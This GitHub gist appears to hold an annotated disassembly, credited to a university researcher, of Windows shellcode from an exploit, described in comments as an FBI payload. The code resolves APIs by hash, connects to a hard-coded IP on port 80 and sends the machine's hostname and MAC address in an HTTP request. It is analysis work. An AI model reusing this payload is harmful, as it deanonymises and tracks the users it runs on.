Skip to content

Instantly share code, notes, and snippets.

@HILTMARTEN-ANTWARPUS
Created September 30, 2013 17:07
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save HILTMARTEN-ANTWARPUS/6766905 to your computer and use it in GitHub Desktop.
Save HILTMARTEN-ANTWARPUS/6766905 to your computer and use it in GitHub Desktop.
; ---------------------------------------------------------------------------
; File Name : C:\Users\gho\Desktop\fbi-sc.bin
; Gareth Owen, University of Portsmouth
; Load in Notepad++ for syntax highlighting
pusha
cld ; direction flag clear for string ops
call start ; ebp=locate
; ebp also used as position independant data pointer ebp[offset]
; metasploit function resolver
; https://github.com/iagox86/nbtool/blob/master/samples/shellcode-win32/block_api.asm
; function hashes: https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/hash.py
;
; push onto stack: hash of function name and parameters
; runs api call
; returns result through eax
;
LocateProc: ; DATA CROSSREF: 00000092
; 0000009
hashcode = dword ptr -4
pusha
mov ebp, esp
xor edx, edx
mov edx, fs:[edx+30h] ; PEB location
mov edx, [edx+0Ch] ; module list / PEB->ldr
mov edx, [edx+14h] ; first module
next_mod: ; CODE CROSSREF: LocateProc+87
mov esi, [edx+28h]
movzx ecx, word ptr [edx+26h]
xor edi, edi
loop_modname: ; CODE CROSSREF: LocateProc+26
xor eax, eax
lodsb
cmp al, 61h ; 'a'
jl short not_lowercase
sub al, 20h ; ' '
not_lowercase: ; CODE CROSSREF: LocateProc+1D
ror edi, 0Dh
add edi, eax
loop loop_modname
push edx
push edi
mov edx, [edx+10h]
mov eax, [edx+3Ch]
add eax, edx
mov eax, [eax+78h]
test eax, eax
jz short get_next_mod1
add eax, edx
push eax
mov ecx, [eax+18h]
loc_46:
mov ebx, [eax+20h]
add ebx, edx
get_next_func: ; CODE CROSSREF: LocateProc+60
jecxz short get_next_mod
dec ecx
mov esi, [ebx+ecx*4]
add esi, edx
xor edi, edi
loop_funcname: ; CODE CROSSREF: LocateProc+58
xor eax, eax
lodsb
ror edi, 0Dh
add edi, eax
cmp al, ah
jnz short loop_funcname
add edi, [ebp-8]
cmp edi, [ebp+24h]
jnz short get_next_func
pop eax
mov ebx, [eax+24h]
add ebx, edx
mov cx, [ebx+ecx*2]
mov ebx, [eax+1Ch]
add ebx, edx
mov eax, [ebx+ecx*4]
add eax, edx
mov [esp+28h+hashcode], eax
pop ebx ; stack cleanup before api call
pop ebx
popa
pop ecx
pop edx
push ecx ; caller's return address
jmp eax ; run api call
; ---------------------------------------------------------------------------
get_next_mod: ; CODE CROSSREF: LocateProc:get_next_func
pop eax
get_next_mod1: ; CODE CROSSREF: LocateProc+37
pop edi
pop edx
mov edx, [edx]
jmp short next_mod
LocateProc endp ; sp-analysis failed
; ---------------------------------------------------------------------------
connectTryCounter db 5 ; DATA CROSSREF: 00000106
; ---------------------------------------------------------------------------
start: ; CODE CROSSREF: 00000002
pop ebp ; ebp=locate
;
cmp dword ptr [getRequestStr ], ' TEG' ; sanity check - did exploit suceed OK?
jnz short error
lea eax, [ws2_32_dll] ; "ws2_32"
push eax
push 726774Ch ; kernel32.dll!LoadLibraryA
call ebp
test eax, eax
jz short error
lea eax, [iphlpapi_dll] ; "IPHLPAPI"
push eax
push 726774Ch ; kernel32.dll!LoadLibraryA
call ebp
test eax, eax
jz short error
mov ebx, 190h
sub esp, ebx
push esp ; buffer for WSA info
push ebx ; wVersionRequested = 400
push 6B8029h ; ws2_32.dll!WSAStartup
call ebp
add esp, ebx ; ditch wsa info - we dont want it
test eax, eax ; still check we got an ok result though
jnz short error
push eax ; no flags
push eax ; no group action
push eax ; no protocol info
push eax ; no protocol specified
inc eax ; eax=1
push eax ; SOCK_STREAM
inc eax ; eax=2
push eax ; addrfamily=AF_INET
push 0E0DF0FEAh ; ws2_32.dll!WSASocketA
call ebp
xor ebx, ebx
not ebx
cmp ebx, eax
jz short error
mov ebx, eax
loc_F1: ; CODE CROSSREF: 0000010C
push 10h ; length
lea esi, [sockAddr] ; sockaddr struct -- FBI IP here
push esi ; sockaddr struct
push ebx ; socket
push 6174A599h ; ws2_32.dll!connect
call ebp
test eax, eax
jz short connected
dec [connectTryCounter]
jnz short loc_F1 ; retry to connect up to 5 times
error: ; CODE CROSSREF: 0000009C
; 000000AE
cmp [SentToFBIFlag], 1
jz short setupcrash ; did shellcode suceed?
call httpHeaderConstruct
jmp short jmptocrashcode ; jumps to crash code in middle of data
; ---------------------------------------------------------------------------
setupcrash: ; CODE CROSSREF: 00000115
call httpRequestLengthCalc
jmptocrashcode: ; CODE CROSSREF: 0000011C
jmp edi ; jumps to crash code in middle of data
; ---------------------------------------------------------------------------
connected: ; CODE CROSSREF: 00000104
mov eax, 100h
sub esp, eax
mov edx, esp
push edx
push eax ; buffer length=100h
push edx ; name buffer
push 1DE49B6h ; ws2_32.dll!gethostname
call ebp
pop edi
add esp, 100h
test eax, eax ; check result
jnz closesocket
push edi
call quasi_strlen ; calculates string length - side effect, finds end string null
;
; output
; edi=end of str
; ecx=strlen
pop esi
mov edx, ecx
lea edi, [getRequestStr] ; "GET /05cea4de-951d-4037-bf8f-f69055b279"...
call quasi_strlen ; calculates string length - side effect, finds end string null
;
; output
; edi=end of str
; ecx=strlen
dec edi
cmp edx, 20h ; ' ' ; sanity check..
jl short loc_166 ; append user's host address to Host field of http header
mov edx, 20h ; ' '
loc_166: ; CODE CROSSREF: 0000015F
mov ecx, edx ; append user's host address to Host field of http header
push esi
rep movsb
mov ecx, 0Dh
lea esi, [cookieStr] ; now append cookie string
rep movsb
mov [addrtoputmacaddr], edi
pop esi
push esi ; our local hostname, resolve to ip
push 803428A9h ; ws2_32.dll!gethostbyname
call ebp
test eax, eax ; eax = hostent
jz closesocket ; gethostbyname failed!
mov cx, [eax+0Ah]
cmp cx, 4 ; result sanity check
jb closesocket
lea eax, [eax+0Ch]
mov eax, [eax]
mov ecx, [eax]
mov ecx, [ecx] ; ip addr
mov eax, 100h
push eax
mov edi, esp
sub esp, eax
mov esi, esp
push edi ; mac addr length
push esi ; mac addr destination
push ecx ; srcip
push ecx ; destip
push 0B8D27248h ; iphlpapi.dll!SendARP
call ebp ; get PC mac address
test eax, eax
add esp, 104h
movzx ecx, word ptr [edi]
cmp ecx, 6 ; check mac addr right length (48bit)
jb short closesocket
mov ecx, 6
mov eax, 10h
sub esp, eax
mov edi, esp
mov edx, ecx
shl edx, 1
push eax
push edx
macaddrtostring: ; CODE CROSSREF: 0000020B
xor edx, edx ; converts binary MAC address to a string
; for incorporation into a http request
mov dl, [esi]
mov al, dl
and al, 0F0h ; high nibble
shr al, 4
cmp al, 9
ja short loc_1F4
add al, 30h ; '0'
jmp short loc_1F6
; ---------------------------------------------------------------------------
loc_1F4: ; CODE CROSSREF: 000001EE
add al, 37h ; '7'
loc_1F6: ; CODE CROSSREF: 000001F2
mov [edi], al
inc edi
mov al, dl
and al, 0Fh ; low nibble
cmp al, 9
ja short loc_205
add al, 30h ; '0'
jmp short loc_207
; ---------------------------------------------------------------------------
loc_205: ; CODE CROSSREF: 000001FF
add al, 37h ; '7'
loc_207: ; CODE CROSSREF: 00000203
mov [edi], al
inc edi
inc esi
loop macaddrtostring ; converts binary MAC address to a string
; for incorporation into a http request
pop ecx
sub edi, ecx
mov esi, edi ; move mac address string to http request
pop eax
add esp, eax
mov edi, [addrtoputmacaddr]
rep movsb
mov [SentToFBIFlag], 1
call httpHeaderConstruct ; append remainder of header
xor eax, eax
push eax ; flags
push ecx ; length
sub edi, ecx ; put buffer pointer back to beginning of buffer
dec edi
push edi ; buffer
push ebx ; socket
push 5F38EBC2h ; ws2_32.dll!send
call ebp
closesocket: ; CODE CROSSREF: 00000141
; 00000189 ...
push ebx
push 614D6E75h ; ws2_32.dll!closesocket
call ebp
jmp error
; =============== S U B R O U T I N E =======================================
; calculates string length - side effect, finds end string null
;
; output
; edi=end of str
; ecx=strlen
quasi_strlen ; CODE CROSSREF: 00000148
; 00000156 ...
xor ecx, ecx
not ecx
loc_24A:
xor eax, eax
repne scasb
loc_24E:
not ecx
dec ecx
retn
quasi_strlen endp
; ---------------------------------------------------------------------------
addrtoputmacaddr dd 0 ; DATA CROSSREF: 00000178
; 00000215
SentToFBIFlag db 0 ; DATA CROSSREF: error
; 0000021D
; =============== S U B R O U T I N E =======================================
httpHeaderConstruct ; CODE CROSSREF: 00000117
; 00000224
lea edi, [getRequestStr] ; "GET /05cea4de-951d-4037-bf8f-f69055b279"...
call quasi_strlen ; calculates string length - side effect, finds end string null
;
; output
; edi=end of str
; ecx=strlen
dec edi ; remove null pointer
mov ecx, 4Fh ; 'O'
lea esi, [httpHeaderStr] ; "\r\nConnection: keep-alive\r\nAccept: */*\r\n"...
rep movsb ; append httpheaderstr
httpRequestLengthCalc: ; CODE CROSSREF: setupcrash
lea edi, [getRequestStr] ; "GET /05cea4de-951d-4037-bf8f-f69055b279"...
call quasi_strlen ; calculates string length - side effect, finds end string null
;
; output
; edi=end of str
; ecx=strlen
retn
httpHeaderConstruct endp
; ---------------------------------------------------------------------------
httpHeaderStr db 0Dh,0Ah ; DATA CROSSREF: httpHeaderConstruct+11
db 'Connection: keep-alive',0Dh,0Ah
db 'Accept: */*',0Dh,0Ah
db 'Accept-Encoding: gzip',0Dh,0Ah
db 0Dh,0Ah,0
; ---------------------------------------------------------------------------
add edi, 0Eh ; gets copied with the above to end of getrequeststr
; it's then jumped to by the crash jmps
; searches for non-null characters and runs them
xor ecx, ecx
not ecx ; scan for nonnull characcter and jmp to it
xor eax, eax
repe scasb
dec edi
jmp edi ; prob the nop at 0x3bb
; ---------------------------------------------------------------------------
cookieStr db 0Dh,0Ah ; DATA CROSSREF: 00000170
db 'Cookie: ID='
ws2_32_dll db 'ws2_32',0 ; DATA CROSSREF: 0000009E
iphlpapi_dll db 'IPHLPAPI',0 ; DATA CROSSREF: 000000B0
sockAddr db 2 ; DATA CROSSREF: 000000F3
; sa_family
sockaddr_in db 0 ; sin_family
db 0 ; port
db 50h ; P ; port=80
db 41h ; A ; ip addr = 65.222.202.54
db 0DEh ; Ţ
db 0CAh ; Ę
db 36h ; 6
getRequestStr db 'GET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1',0Dh,0Ah
; DATA CROSSREF: 00000092
; 00000150 ...
db 'Host: ',0
db 0 ; buffer space for construction of complete http request
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 90h ; the terminal no-op
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment